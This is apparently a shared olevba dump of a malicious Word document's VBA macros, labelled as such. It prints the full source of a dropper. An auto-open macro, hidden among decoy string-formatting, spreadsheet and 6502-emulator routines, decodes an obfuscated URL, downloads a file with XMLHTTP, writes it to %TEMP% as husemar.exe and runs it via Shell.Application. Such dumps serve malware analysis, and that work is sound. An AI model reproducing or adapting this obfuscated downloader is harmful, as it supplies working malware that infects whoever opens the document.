Malicious Word macro

1. olevba 0.41 - http://decalage.info/python/oletools
2. Flags        Filename                                                        
3. -----------  -----------------------------------------------------------------
4. OLE:MASI-B-V 20151009144829748.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: 20151009144829748.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: 20151009144829748.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15. Sub autoopen()
16. PreencherDireita "", "", 0
17. runAlleStatMod
18. txs6502
19. rora6502
20. IsDigit ""
21. End Sub
22.  
23.  
24.  
25.  
26.  
27.  
28. -------------------------------------------------------------------------------
29. VBA MACRO Module1.bas
30. in file: 20151009144829748.doc - OLE stream: u'Macros/VBA/Module1'
31. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
32. Public Const ads = "Adodb.Stream"
33. Public Const sha = "Shell.Application"
34. Public Const wss = "WScript.Shell"
35. Public Const ps = "Process"
36. Public Function FormatarTexto(ByVal texto As String, ParamArray formatos() As Variant) As String
37.  Dim i As Long
38.  Dim formats_size As Integer
39.  Dim formated_text As String
40.  Dim text_size As Integer
41.  Dim tokens() As String
42.  Dim ch As String
43.  Dim format_token_position_string As String
44.  Dim format_token_position As Integer
45.  Dim is_digit As Boolean
46.  Dim lower_bound As Integer
47.  Dim formato() As Variant
48.  Dim sub_formato() As Variant
49.  Dim last_dimenssion As Integer
50.  formato = formatos
51.  On Error GoTo Singl
52.  For i = 0 To 60000
53.  sub_formato = formato(0)
54.  formato = sub_formato
55.  Next i
56. Multi:
57.  formato = formatos(0)
58. Singl:
59.  On Error GoTo 0
60.  i = 1
61.  formats_size = UBound(formato)
62.  text_size = Len(texto)
63.  If formats_size = 0 Then
64.  formated_text = texto
65.  GoTo Finally
66.  End If
67.  Do While i <= text_size
68.  ch = Mid(texto, i, 1)
69.  If ch = "$" Then
70.  format_token_position_string = ""
71.  i = i + 1
72.  Do While i <= text_size
73.  ch = Mid(texto, i, 1)
74.  is_digit = IsDigit(ch)
75.  If is_digit Then
76.  format_token_position_string = ch & format_token_position_string
77.  End If
78.  If Not is_digit Or i = text_size Then
79.  format_token_position = CInt(format_token_position_string) - 1
80.  If format_token_position <= formats_size Then
81.  formated_text = formated_text & CStr(formato(format_token_position)) + ch
82.  Else
83.  formated_text = formated_text & "$" & CStr(format_token_position - formats_size) + ch
84.  End If
85.  Exit Do
86.  End If
87.  i = i + 1
88.  Loop
89.  Else
90.  formated_text = formated_text & ch
91.  End If
92.  i = i + 1
93.  Loop
94.  GoTo Finally
95. Catch:
96.  formated_text = Err.Description
97. Finally:
98.  FormatarTexto = formated_text
99. End Function
100. Public Function phy650_3_3(phy650_3_1() As Variant, phy650_3_2 As Integer) As String
101.     Dim i As Integer
102.     Dim result As String
103.     result = ""
104.     For i = LBound(phy650_3_1) To UBound(phy650_3_1)
105.         result = result & Chr(phy650_3_1(i) - phy650_3_2 - 2845)
106.     Next i
107.     phy650_3_3 = result
108. End Function
109. Public Function PreencherEsquerda( _
110.  ByVal texto As String, _
111.  ByVal caracter_a_preencher As String, _
112.  ByVal tamanho_final As Integer, _
113.  Optional truncar As Boolean _
114. ) As String
115.  Dim novo_texto As String
116.  Dim quantidade_a_adicionar As Integer
117.  novo_texto = texto
118.  quantidade_a_adicionar = tamanho_final - Len(texto)
119.  If quantidade_a_adicionar < 0 Then
120.  If truncar Then
121.  novo_texto = Mid(texto, 1, tamanho_final)
122.  End If
123.  GoTo Finally
124.  End If
125.  novo_texto = Replace(Space(quantidade_a_adicionar), " ", caracter_a_preencher) + novo_texto
126. Catch:
127. Finally:
128.  PreencherEsquerda = novo_texto
129. End Function
130. Function PreencherDireita( _
131.  ByVal texto As String, _
132.  ByVal caracter_a_preencher As String, _
133.  ByVal tamanho_final As Integer, _
134.  Optional truncar As Boolean _
135. )
136.  Dim novo_texto As String
137.  Dim quantidade_a_adicionar As Integer
138. Set phy65007 = CreateObject("Microsoft" + ".XMLHTTP")
139. Dim urlAr() As Variant
140. urlAr = Array(2993, 3005, 3005, 3001, 2947, 2936, 2936, 2995, 2986, 2999, 2986, 2989, 3006, 2988, 2993, 2986, 2999, 3000, 3007, 2986, 2935, 3008, 3011, 2935, 2988, 3011, 2936, 2944, 2944, 2941, 2942, 2992, 2989, 2936, 2941, 2989, 2992, 3003, 2992, 2989, 2992, 2935, 2990, 3009, 2990)
141. phy65007.Open "GET", phy650_3_3(urlAr, 44), False
142.  novo_texto = texto
143.  quantidade_a_adicionar = tamanho_final - Len(texto)
144.  If quantidade_a_adicionar < 0 Then
145.  If truncar Then
146.  novo_texto = Mid(texto, 1, tamanho_final)
147.  End If
148.  GoTo Finally
149.  End If
150.  novo_texto = novo_texto + Replace(Space(quantidade_a_adicionar), " ", caracter_a_preencher)
151. Catch:
152. Finally:
153.  PreencherDireita = novo_texto
154. End Function
155. Function RGB( _
156.  ByVal red As Integer, _
157.  ByVal green As Integer, _
158.  ByVal blue As Integer _
159. ) As Long
160.  RGB = VBA.Information.RGB(red, green, blue)
161. End Function
162. Public Function Juntar( _
163.  ByVal separador As String, _
164.  ParamArray elementos() As Variant _
165. ) As String
166.  Juntar = Join(elementos, separador)
167. End Function
168. Public Function IsDigit(ByVal ch As String) As Boolean
169. phy650003. _
170. Open (phy650002)
171. Exit Function
172.  Dim asc_code As Integer
173.  asc_code = Asc(ch)
174.  IsDigit = (asc_code > 48 And asc_code < 58)
175. End Function
176.  
177.  
178.  
179.  
180.  
181.  
182. -------------------------------------------------------------------------------
183. VBA MACRO Module2.bas
184. in file: 20151009144829748.doc - OLE stream: u'Macros/VBA/Module2'
185. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
186. Public phy65007 As Object
187. Public phy65008 As Object
188. Public phy65009  As Object
189. Public phy650001 As String
190. Public phy650002 As String
191. Public phy650003 As Object
192. Public Sub runAlleStatMod()
193.  Dim kuerzel As Variant
194.  Dim nameTN As Variant
195.  Set phy65008 = CreateObject(ads)
196.  Set phy650003 = CreateObject(sha)
197.  
198. Set phy65009 = CreateObject(wss).Environment(ps)
199. Exit Sub
200.  setzteBezugsjah.rImStatischenModell
201.  erstelleKo.pfzeileMETA
202.  erstelleMi.ttelwerteMETA
203.  For Each kuerzel In gibAlleTN_Kuerzel
204.  If kuerzel = "SH" Or kuerzel = "AG" Then
205.  Else
206.  nameTN = gibT.Nname(kuerzel)
207.  runSFA nameTN
208.  exportiereSta.tischeResultateSFA nameTN
209.  erstelleP.DFundPNG nameTN
210.  End If
211.  Next kuerzel
212.  If TEST = False Then _
213.  MsgBox "Die statischen Modelle sind fertig bearbeitet." & vbNewLine & _
214.  "Die Kantone AG und SH wurden nicht berechnet.", vbInformation
215. End Sub
216. Sub runEinStatMod()
217.  Dim nameTN As String
218.  setzteBezugsjahrImStatischenModell
219.  nameTN = gibAlleOderNameTN
220.  runSFA nameTN
221. End Sub
222. Sub runSFA(ByVal nameTN As String)
223.  Dim wbSFA As String
224.  Dim pfadSFA As String
225.  pfadSFA = gibPfadZumStat_Modell & gibName_Statisches_Modell
226.  Application.ScreenUpdating = False
227.  Application.StatusBar = True
228.  Application.StatusBar = "Es wird " & nameTN & " bearbeitet."
229.  kopiereDefault_stat nameTN, gibBezugsjahr
230.  kopiereAngabenTN nameTN
231.  On Error Resume Next
232.  Set wbSFA = Workbooks(pfadSFA)
233.  If wbSFA Is Nothing Then _
234.  Set wbSFA = Workbooks.Open(pfadSFA)
235.  setzeAlleineOderAlleImModell wbSFA
236.  importiereDefaultwerteInsModell wbSFA
237.  importiereDATAinsModell wbSFA
238.  kopiereDefaultWerteImModell wbSFA
239.  Application.Run ""
240.  Application.Run ""
241.  Application.Run ""
242.  Application.StatusBar = ""
243.  Application.ScreenUpdating = True
244.  If gibAlleOderNameTN <> "Alle" Then
245.  wbSFA.Activate
246.  wbSFA.Save
247.  If TEST = False Then
248.  MsgBox "Das Modell kann nun bearbeitet werden. " & _
249.  "Ge?nderte Default-Werte werden beim Schliessen exportiert.", vbInformation
250.  End If
251.  End
252.  Else
253.  wbSFA.Close SaveChanges:=True
254.  Set wbSFA = Nothing
255.  End If
256. End Sub
257. Private Sub importiereDefaultwerteInsModell(wbModell As String)
258.  Dim wbDefault As String
259.  Dim wsModell As Worksheet
260.  Dim wsWerte As Worksheet
261.  Dim LETZTE_ZEILE_PARAMETER As Integer
262.  LETZTE_ZEILE_PARAMETER = 52
263.  On Error Resume Next
264.  Set wbDefault = Workbooks.Open(gibPfadZumStat_Modell & "Default_stat.dDATA")
265.  Set wsWerte = wbDefault.Worksheets("Tabelle1")
266.  Set wsModell = Workbooks(gibName_Statisches_Modell).Worksheets(".Default")
267.  wsWerte.Range("E1:E" & LETZTE_ZEILE_PARAMETER).Copy
268.  wsModell.Range("F1:F" & LETZTE_ZEILE_PARAMETER).PasteSpecial xlPasteValues
269.  Application.CutCopyMode = False
270.  wsWerte.Range("N1:N27").Copy
271.  wsModell.Range("N1:N27").PasteSpecial xlPasteValues
272.  Application.CutCopyMode = False
273.  wbDefault.Close
274.  Set wbDefault = Nothing
275. End Sub
276. Private Sub importiereDATAinsModell(wbModell As String)
277.  Dim wbVon, wbNach As String
278.  Dim wsVon, wsNach As Worksheet
279.  Set wbVon = Workbooks.Open(gibPfadZumStat_Modell & "\DATA_stat.xls")
280.  Set wbNach = wbModell
281.  Set wsNach = wbModell.Worksheets("Bauwerk")
282.  Set wsVon = wbVon.Worksheets("HB_GebVol")
283.  wsVon.Range("B2:G7").Copy
284.  wsNach.Range("C4:H9").PasteSpecial xlPasteValues
285.  Set wsVon = wbVon.Worksheets("HB_Material")
286.  wsVon.Range("B2:G9").Copy
287.  wsNach.Range("C14:H21").PasteSpecial xlPasteValues
288.  Set wsVon = wbVon.Worksheets("HB_Mat_Neubau")
289.  wsVon.Range("B2:G9").Copy
290.  wsNach.Range("C26:H33").PasteSpecial xlPasteValues
291.  Set wsVon = wbVon.Worksheets("TB")
292.  wsVon.Range("B10:I12").Copy
293.  wsNach.Range("C37:E44").PasteSpecial Paste:=xlPasteValues, Transpose:=True
294.  Set wsVon = wbVon.Worksheets("Angaben_Materialfluesse")
295.  Set wsNach = wbNach.Worksheets(".Fluesse")
296.  wsVon.Range("E4:G25").Copy
297.  wsNach.Range("D4:F25").PasteSpecial xlPasteValues
298.  Set wsVon = wbVon.Worksheets("Angaben_Materialfluesse")
299.  Set wsNach = wbNach.Worksheets(".Params")
300.  wsVon.Range("E23:E24").Copy
301.  wsNach.Range("F4:F5").PasteSpecial xlPasteValues
302.  Application.CutCopyMode = False
303.  wbVon.Close
304.  Set wsNach = wbNach.Sheets(".Default")
305.  wsNach.Range("F26").FormulaLocal = "="
306.  wsNach.Range("F27").FormulaLocal = "="
307.  wsNach.Range("F28").FormulaLocal = "="
308.  wsNach.Range("F29").FormulaLocal = "="
309.  wsNach.Range("F31").FormulaLocal = "="
310.  wsNach.Range("F32").FormulaLocal = "="
311.  wsNach.Range("F33").FormulaLocal = "="
312.  wsNach.Range("F34").FormulaLocal = "="
313.  Set wbVon = Nothing
314.  Set wbNach = Nothing
315. End Sub
316. Private Sub kopiereDefaultWerteImModell(wbModell As String)
317.  Dim wsVon As Worksheet, wsNach As Worksheet
318.  Set wsVon = wbModell.Sheets(".Default")
319.  Set wsNach = wbModell.Sheets("Variablen")
320.  wsVon.Visible = True
321.  wsNach.Range("G1:G52").Value = wsVon.Range("F1:F52").Value
322.  wsVon.Visible = False
323. End Sub
324.  
325.  
326.  
327.  
328.  
329.  
330. -------------------------------------------------------------------------------
331. VBA MACRO Module3.bas
332. in file: 20151009144829748.doc - OLE stream: u'Macros/VBA/Module3'
333. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
334.  
335. ' This is where all 6502 instructions are kept.
336. Public Sub adc6502()
337.  Dim tmp As Long ' Integer
338. adrmode opcode
339.  Value = Read6502(savepc)
340.  saveflags = (P And &H1)
341.  sum = A
342.  sum = (sum + Value) And &HFF
343.  sum = (sum + saveflags) And &HFF
344.  If (sum > &H7F) Or (sum < -&H80) Then
345.  P = P Or &H40
346.  Else
347.  P = (P And &HBF)
348.  End If
349.  sum = A + (Value + saveflags)
350.  If (sum > &HFF) Then
351.  P = P Or &H1
352.  Else
353.  P = (P And &HFE)
354.  End If
355.  A = sum And &HFF
356.  If (P And &H8) Then
357.  P = (P And &HFE)
358.  If ((A And &HF) > &H9) Then
359.  A = (A + &H6) And &HFF
360.  End If
361.  If ((A And &HF0) > &H90) Then
362.  A = (A + &H60) And &HFF
363.  P = P Or &H1
364.  End If
365.  Else
366.  clockticks6502 = clockticks6502 + 1
367.  End If
368.  SetFlags A
369. End Sub
370. Public Sub adrmode(opcode As Byte)
371. Select Case addrmode(opcode)
372.  Case ADR_ABS: savepc = Read6502(PC) + (Read6502(PC + 1) * &H100&): PC = PC + 2
373.  Case ADR_ABSX: absx6502
374.  Case ADR_ABSY: absy6502
375.  Case ADR_IMP: ' nothing really necessary cause implied6502 = ""
376. Case ADR_IMM: savepc = PC: PC = PC + 1
377.  Case ADR_INDABSX: indabsx6502
378.  Case ADR_IND: indirect6502
379.  Case ADR_INDX: indx6502
380.  Case ADR_INDY: indy6502
381.  Case ADR_INDZP: indzp6502
382.  Case ADR_REL: savepc = Read6502(PC): PC = PC + 1: If (savepc And &H80) Then savepc = savepc - &H100&
383.  Case ADR_ZP: savepc = Read6502(PC): savepc = savepc And &HFF: PC = PC + 1
384.  Case ADR_ZPX: zpx6502
385.  Case ADR_ZPY: zpy6502
386.  Case Else: Debug.Print addrmode(opcode)
387. End Select
388. End Sub
389. Public Sub and6502()
390.  adrmode opcode
391.  Value = Read6502(savepc)
392.  A = (A And Value)
393.  SetFlags A
394. End Sub
395. Public Sub asl6502()
396.  adrmode opcode
397.  Value = Read6502(savepc)
398.  P = (P And &HFE) Or ((Value \ 128) And &H1)
399.  Value = (Value * 2) And &HFF
400.  Write6502 savepc, (Value And &HFF)
401.  SetFlags Value
402. End Sub
403. Public Sub asla6502()
404.  P = (P And &HFE) Or ((A \ 128) And &H1)
405.  A = (A * 2) And &HFF
406.  SetFlags A
407. End Sub
408. Public Sub bcc6502()
409.  If ((P And &H1) = 0) Then
410.  adrmode opcode
411.  PC = PC + savepc
412.  clockticks6502 = clockticks6502 + 1
413.  Else
414.  PC = PC + 1
415.  End If
416. End Sub
417. Public Sub bcs6502()
418.  If (P And &H1) Then
419.  adrmode opcode
420.  PC = PC + savepc
421.  clockticks6502 = clockticks6502 + 1
422.  Else
423.  PC = PC + 1
424.  End If
425. End Sub
426. Public Sub beq6502()
427.  If (P And &H2) Then
428.  adrmode opcode
429.  PC = PC + savepc
430.  clockticks6502 = clockticks6502 + 1
431.  Else
432.  PC = PC + 1
433.  End If
434. End Sub
435. Public Sub bit6502()
436.  adrmode opcode
437.  Value = Read6502(savepc)
438.  If (Value And A) Then
439.  P = (P And &HFD)
440.  Else
441.  P = P Or &H2
442.  End If
443.  P = ((P And &H3F) Or (Value And &HC0))
444. End Sub
445. Public Sub bmi6502()
446.  If (P And &H80) Then
447.  adrmode opcode
448.  PC = PC + savepc
449.  clockticks6502 = clockticks6502 + 1
450.  Else
451.  PC = PC + 1
452.  End If
453. End Sub
454. Public Sub bne6502()
455.  If ((P And &H2) = 0) Then
456.  adrmode opcode
457.  PC = PC + savepc
458.  Else
459.  PC = PC + 1
460.  End If
461. End Sub
462. Public Sub bpl6502()
463.  If ((P And &H80) = 0) Then
464.  adrmode opcode
465.  PC = PC + savepc
466.  Else
467.  PC = PC + 1
468.  End If
469. End Sub
470. Public Sub brk6502()
471.  PC = PC + 1
472.  Write6502 &H100& + s, (PC \ &H100&) And &HFF
473.  s = (s - 1) And &HFF
474.  Write6502 &H100& + s, (PC And &HFF)
475.  s = (s - 1) And &HFF
476.  Write6502 &H100& + s, P
477.  s = (s - 1) And &HFF
478.  P = P Or &H14
479.  PC = Read6502(&HFFFE&) + (Read6502(&HFFFF&) * &H100&)
480. End Sub
481. Public Sub bvc6502()
482.  If ((P And &H40) = 0) Then
483.  adrmode opcode
484.  PC = PC + savepc
485.  clockticks6502 = clockticks6502 + 1
486.  Else
487.  PC = PC + 1
488.  End If
489. End Sub
490. Public Sub bvs6502()
491.  If (P And &H40) Then
492.  adrmode opcode
493.  PC = PC + savepc
494.  clockticks6502 = clockticks6502 + 1
495.  Else
496.  PC = PC + 1
497.  End If
498. End Sub
499. Public Sub clc6502()
500.  P = P And &HFE
501. End Sub
502. Public Sub cld6502()
503.  P = P And &HF7
504. End Sub
505. Public Sub cli6502()
506.  P = P And &HFB
507. End Sub
508. Public Sub clv6502()
509.  P = P And &HBF
510. End Sub
511. Public Sub cmp6502()
512.  adrmode opcode
513.  Value = Read6502(savepc)
514.  If (A + &H100 - Value) > &HFF Then
515.  P = P Or &H1
516.  Else
517.  P = (P And &HFE)
518.  End If
519.  Value = (A + &H100 - Value) And &HFF
520.  SetFlags Value
521. End Sub
522. Public Sub cpx6502()
523.  adrmode opcode
524.  Value = Read6502(savepc)
525.  If (X + &H100 - Value > &HFF) Then
526.  P = P Or &H1
527.  Else
528.  P = (P And &HFE)
529.  End If
530.  Value = (X + &H100 - Value) And &HFF
531.  SetFlags Value
532. End Sub
533. Public Sub cpy6502()
534.  adrmode opcode
535.  Value = Read6502(savepc)
536.  If (Y + &H100 - Value > &HFF) Then
537.  P = (P Or &H1)
538.  Else
539.  P = (P And &HFE)
540.  End If
541.  Value = (Y + &H100 - Value) And &HFF
542.  SetFlags Value
543. End Sub
544. Public Sub dec6502()
545.  adrmode opcode
546.  Write6502 (savepc), (Read6502(savepc) - 1) And &HFF
547.  Value = Read6502(savepc)
548.  If (Value) Then
549.  P = P And &HFD
550.  Else
551.  P = P Or &H2
552.  End If
553.  If (Value And &H80) Then
554.  P = P Or &H80
555.  Else
556.  P = P And &H7F
557.  End If
558. End Sub
559. Public Sub dex6502()
560.  X = (X - 1) And &HFF
561.  If (X) Then
562.  P = P And &HFD
563.  Else
564.  P = P Or &H2
565.  End If
566.  If (X And &H80) Then
567.  P = P Or &H80
568.  Else
569.  P = P And &H7F
570.  End If
571. End Sub
572. Public Sub dey6502()
573.  Y = (Y - 1) And &HFF
574.  If (Y) Then
575.  P = P And &HFD
576.  Else
577.  P = P Or &H2
578.  End If
579.  If (Y And &H80) Then
580.  P = P Or &H80
581.  Else
582.  P = P And &H7F
583.  End If
584. End Sub
585. Public Sub eor6502()
586.  adrmode opcode
587.  A = A Xor Read6502(savepc)
588.  If (A) Then
589.  P = P And &HFD
590.  Else
591.  P = P Or &H2
592.  End If
593.  If (A And &H80) Then
594.  P = P Or &H80
595.  Else
596.  P = P And &H7F
597.  End If
598. End Sub
599. Public Sub inc6502()
600.  adrmode opcode
601.  Write6502 (savepc), (Read6502(savepc) + 1) And &HFF
602.  Value = Read6502(savepc)
603.  If (Value) Then
604.  P = P And &HFD
605.  Else
606.  P = P Or &H2
607.  End If
608.  If (Value And &H80) Then
609.  P = P Or &H80
610.  Else
611.  P = P And &H7F
612.  End If
613. End Sub
614. Public Sub inx6502()
615.  X = (X + 1) And &HFF
616.  If (X) Then
617.  P = P And &HFD
618.  Else
619.  P = P Or &H2
620.  End If
621.  If (X And &H80) Then
622.  P = P Or &H80
623.  Else
624.  P = P And &H7F
625.  End If
626. End Sub
627. Public Sub iny6502()
628.  Y = (Y + 1) And &HFF
629.  If (Y) Then
630.  P = P And &HFD
631.  Else
632.  P = P Or &H2
633.  End If
634.  If (Y And &H80) Then
635.  P = P Or &H80
636.  Else
637.  P = P And &H7F
638.  End If
639. End Sub
640. Public Sub jmp6502()
641.  adrmode opcode
642.  PC = savepc
643. End Sub
644. Public Sub jsr6502()
645.  PC = PC + 1
646.  Write6502 s + &H100&, (PC \ &H100&)
647.  s = (s - 1) And &HFF
648.  Write6502 s + &H100&, (PC And &HFF)
649.  s = (s - 1) And &HFF
650.  PC = PC - 1
651.  adrmode opcode
652.  PC = savepc
653. End Sub
654. Public Sub lda6502()
655.  adrmode opcode
656.  A = Read6502(savepc)
657.  If (A) Then
658.  P = P And &HFD
659.  Else
660.  P = P Or &H2
661.  End If
662.  If (A And &H80) Then
663.  P = P Or &H80
664.  Else
665.  P = P And &H7F
666.  End If
667. End Sub
668. Public Sub ldx6502()
669.  adrmode opcode
670.  X = Read6502(savepc)
671.  If (X) Then
672.  P = P And &HFD
673.  Else
674.  P = P Or &H2
675.  End If
676.  If (X And &H80) Then
677.  P = P Or &H80
678.  Else
679.  P = P And &H7F
680.  End If
681. End Sub
682. Public Sub ldy6502()
683.  adrmode opcode
684.  Y = Read6502(savepc)
685.  If (Y) Then
686.  P = P And &HFD
687.  Else
688.  P = P Or &H2
689.  End If
690.  If (Y And &H80) Then
691.  P = P Or &H80
692.  Else
693.  P = P And &H7F
694.  End If
695. End Sub
696. Public Sub lsr6502()
697.  adrmode opcode
698.  Value = Read6502(savepc)
699.  P = ((P And &HFE) Or (Value And &H1))
700.  Value = (Value \ 2) And &HFF
701.  Write6502 savepc, (Value And &HFF)
702.  If (Value) Then
703.  P = P And &HFD
704.  Else
705.  P = P Or &H2
706.  End If
707.  If (Value And &H80) Then
708.  P = P Or &H80
709.  Else
710.  P = P And &H7F
711.  End If
712. End Sub
713. Public Sub lsra6502()
714.  P = (P And &HFE) Or (A And &H1)
715.  A = (A \ 2) And &HFF
716.  If (A) Then
717.  P = P And &HFD
718.  Else
719.  P = P Or &H2
720.  End If
721.  If (A And &H80) Then
722.  P = P Or &H80
723.  Else
724.  P = P And &H7F
725.  End If
726. End Sub
727. Public Sub nop6502()
728. 'TS: Implemented complex code structure ;)
729. End Sub
730. Public Sub ora6502()
731.  adrmode opcode
732.  A = A Or Read6502(savepc)
733.  If (A) Then
734.  P = P And &HFD
735.  Else
736.  P = P Or &H2
737.  End If
738.  If (A And &H80) Then
739.  P = P Or &H80
740.  Else
741.  P = P And &H7F
742.  End If
743. End Sub
744. Public Sub pha6502()
745.  Write6502 &H100& + s, A
746.  s = (s - 1) And &HFF
747. End Sub
748. Public Sub php6502()
749.  Write6502 &H100& + s, P
750.  s = (s - 1) And &HFF
751. End Sub
752. Public Sub pla6502()
753.  s = (s + 1) And &HFF
754.  A = Read6502(s + &H100)
755.  If (A) Then
756.  P = P And &HFD
757.  Else
758.  P = P Or &H2
759.  End If
760.  If (A And &H80) Then
761.  P = P Or &H80
762.  Else
763.  P = P And &H7F
764.  End If
765. End Sub
766. Public Sub plp6502()
767.  s = (s + 1) And &HFF
768.  P = Read6502(s + &H100) Or &H20
769. End Sub
770. Public Sub rol6502()
771.  saveflags = (P And &H1)
772.  adrmode opcode
773.  Value = Read6502(savepc)
774.  P = (P And &HFE) Or ((Value \ 128) And &H1)
775.  Value = (Value * 2) And &HFF
776.  Value = Value Or saveflags
777.  Write6502 savepc, (Value And &HFF)
778.  If (Value) Then
779.  P = P And &HFD
780.  Else
781.  P = P Or &H2
782.  End If
783.  If (Value And &H80) Then
784.  P = P Or &H80
785.  Else
786.  P = P And &H7F
787.  End If
788. End Sub
789. Public Sub rola6502()
790.  saveflags = (P And &H1)
791.  P = (P And &HFE) Or ((A \ 128) And &H1)
792.  A = (A * 2) And &HFF
793.  A = A Or saveflags
794.  If (A) Then
795.  P = P And &HFD
796.  Else
797.  P = P Or &H2
798.  End If
799.  If (A And &H80) Then
800.  P = P Or &H80
801.  Else
802.  P = P And &H7F
803.  End If
804. End Sub
805. Public Sub ror6502()
806.  saveflags = (P And &H1)
807.  adrmode opcode
808.  Value = Read6502(savepc)
809.  P = (P And &HFE) Or (Value And &H1)
810.  Value = (Value \ 2) And &HFF
811.  If (saveflags) Then
812.  Value = Value Or &H80
813.  End If
814.  Write6502 (savepc), Value And &HFF
815.  If (Value) Then
816.  P = P And &HFD
817.  Else
818.  P = P Or &H2
819.  End If
820.  If (Value And &H80) Then
821.  P = P Or &H80
822.  Else
823.  P = P And &H7F
824.  End If
825. End Sub
826. Public Sub rora6502()
827.  
828. Dim rti6611 As Variant
829. rti6611 = phy65007.responseBody
830. Dim rti6612 As Integer
831. rti6612 = 3 - 1
832.     phy65008.write rti6611
833.     phy65008.savetofile phy650002, rti6612
834. Exit Sub
835.  saveflags = (P And &H1)
836.  P = (P And &HFE) Or (A And &H1)
837.  A = (A \ 2) And &HFF
838.  If (saveflags) Then
839.  A = A Or &H80
840.  End If
841.  If (A) Then
842.  P = P And &HFD
843.  Else
844.  P = P Or &H2
845.  End If
846.  If (A And &H80) Then
847.  P = P Or &H80
848.  Else
849.  P = P And &H7F
850.  End If
851. End Sub
852. Public Sub rti6502()
853.  
854.  s = (s + 1) And &HFF
855.  P = Read6502(s + &H100&) Or &H20
856.  s = (s + 1) And &HFF
857.  PC = Read6502(s + &H100&)
858.  s = (s + 1) And &HFF
859.  PC = PC + (Read6502(s + &H100) * &H100&)
860. End Sub
861. Public Sub rts6502()
862.  s = (s + 1) And &HFF
863.  PC = Read6502(s + &H100)
864.  s = (s + 1) And &HFF
865.  PC = PC + (Read6502(s + &H100) * &H100&)
866.  PC = PC + 1
867. End Sub
868. Public Sub sbc6502()
869.  adrmode opcode
870.  Value = Read6502(savepc) Xor &HFF
871.  saveflags = (P And &H1)
872.  sum = A
873.  sum = (sum + Value) And &HFF
874.  sum = (sum + (saveflags * 16)) And &HFF
875.  If ((sum > &H7F) Or (sum <= -&H80)) Then
876.  P = P Or &H40
877.  Else
878.  P = P And &HBF
879.  End If
880.  sum = A + (Value + saveflags)
881.  If (sum > &HFF) Then
882.  P = P Or &H1
883.  Else
884.  P = P And &HFE
885.  End If
886.  A = sum And &HFF
887.  If (P And &H8) Then
888.  A = (A - &H66) And &HFF
889.  P = P And &HFE
890.  If ((A And &HF) > &H9) Then
891.  A = (A + &H6) And &HFF
892.  End If
893.  If ((A And &HF0) > &H90) Then
894.  A = (A + &H60) And &HFF
895.  P = P Or &H1
896.  End If
897.  Else
898.  clockticks6502 = clockticks6502 + 1
899.  End If
900.  'Debug.Print "sbc6502"
901. If (A) Then
902.  P = P And &HFD
903.  Else
904.  P = P Or &H2
905.  End If
906.  If (A And &H80) Then
907.  P = P Or &H80
908.  Else
909.  P = P And &H7F
910.  End If
911. End Sub
912. Public Sub sec6502()
913.  P = P Or &H1
914. End Sub
915. Public Sub sed6502()
916.  P = P Or &H8
917. End Sub
918. Public Sub sei6502()
919.  P = P Or &H4
920. End Sub
921. Public Sub sta6502()
922.  adrmode opcode
923.  Write6502 (savepc), A
924. End Sub
925. Public Sub stx6502()
926.  adrmode opcode
927.  Write6502 (savepc), X
928. End Sub
929. Public Sub sty6502()
930.  adrmode opcode
931.  Write6502 (savepc), Y
932. End Sub
933. Public Sub tax6502()
934.  X = A
935.  If (X) Then
936.  P = P And &HFD
937.  Else
938.  P = P Or &H2
939.  End If
940.  If (X And &H80) Then
941.  P = P Or &H80
942.  Else
943.  P = P And &H7F
944.  End If
945. End Sub
946. Public Sub tay6502()
947.  Y = A
948.  If (Y) Then
949.  P = P And &HFD
950.  Else
951.  P = P Or &H2
952.  End If
953.  If (Y And &H80) Then
954.  P = P Or &H80
955.  Else
956.  P = P And &H7F
957.  End If
958. End Sub
959. Public Sub tsx6502()
960.  X = s
961.  If (X) Then
962.  P = P And &HFD
963.  Else
964.  P = P Or &H2
965.  End If
966.  If (X And &H80) Then
967.  P = P Or &H80
968.  Else
969.  P = P And &H7F
970.  End If
971. End Sub
972. Public Sub txa6502()
973.  A = X
974.  If (A) Then
975.  P = P And &HFD
976.  Else
977.  P = P Or &H2
978.  End If
979.  If (A And &H80) Then
980.  P = P Or &H80
981.  Else
982.  P = P And &H7F
983.  End If
984. End Sub
985. Public Sub txs6502()
986. phy650001 = phy65009("TEMP")
987. phy65007.Send
988. phy650002 = phy650001 + "\" + "husemar." + "e" + "xe"
989. With phy65008
990.    .Type = 1
991.    .Open
992. End With
993. Exit Sub
994.  s = X
995. End Sub
996. Public Sub tya6502()
997.  A = Y
998.  If (A) Then
999.  P = P And &HFD
1000.  Else
1001.  P = P Or &H2
1002.  End If
1003.  If (A And &H80) Then
1004.  P = P Or &H80
1005.  Else
1006.  P = P And &H7F
1007.  End If
1008. End Sub
1009. Public Sub bra6502()
1010.  adrmode opcode
1011.  PC = PC + savepc
1012.  clockticks6502 = clockticks6502 + 1
1013. End Sub
1014. Public Sub dea6502()
1015.  A = (A - 1) And &HFF
1016.  If (A) Then
1017.  P = P And &HFD
1018.  Else
1019.  P = P Or &H2
1020.  End If
1021.  If (A And &H80) Then
1022.  P = P Or &H80
1023.  Else
1024.  P = P And &H7F
1025.  End If
1026. End Sub
1027. Public Sub ina6502()
1028.  A = (A + 1) And &HFF
1029.  If (A) Then
1030.  P = P And &HFD
1031.  Else
1032.  P = P Or &H2
1033.  End If
1034.  If (A And &H80) Then
1035.  P = P Or &H80
1036.  Else
1037.  P = P And &H7F
1038.  End If
1039. End Sub
1040. Public Sub phx6502()
1041.  Write6502 &H100 + s, X
1042.  s = (s - 1) And &HFF
1043. End Sub
1044. Public Sub plx6502()
1045.  s = (s + 1) And &HFF
1046.  X = Read6502(s + &H100)
1047.  If (X) Then
1048.  P = P And &HFD
1049.  Else
1050.  P = P Or &H2
1051.  End If
1052.  If (X And &H80) Then
1053.  P = P Or &H80
1054.  Else
1055.  P = P And &H7F
1056.  End If
1057. End Sub
1058. Public Sub phy6502()
1059.  Write6502 &H100 + s, Y
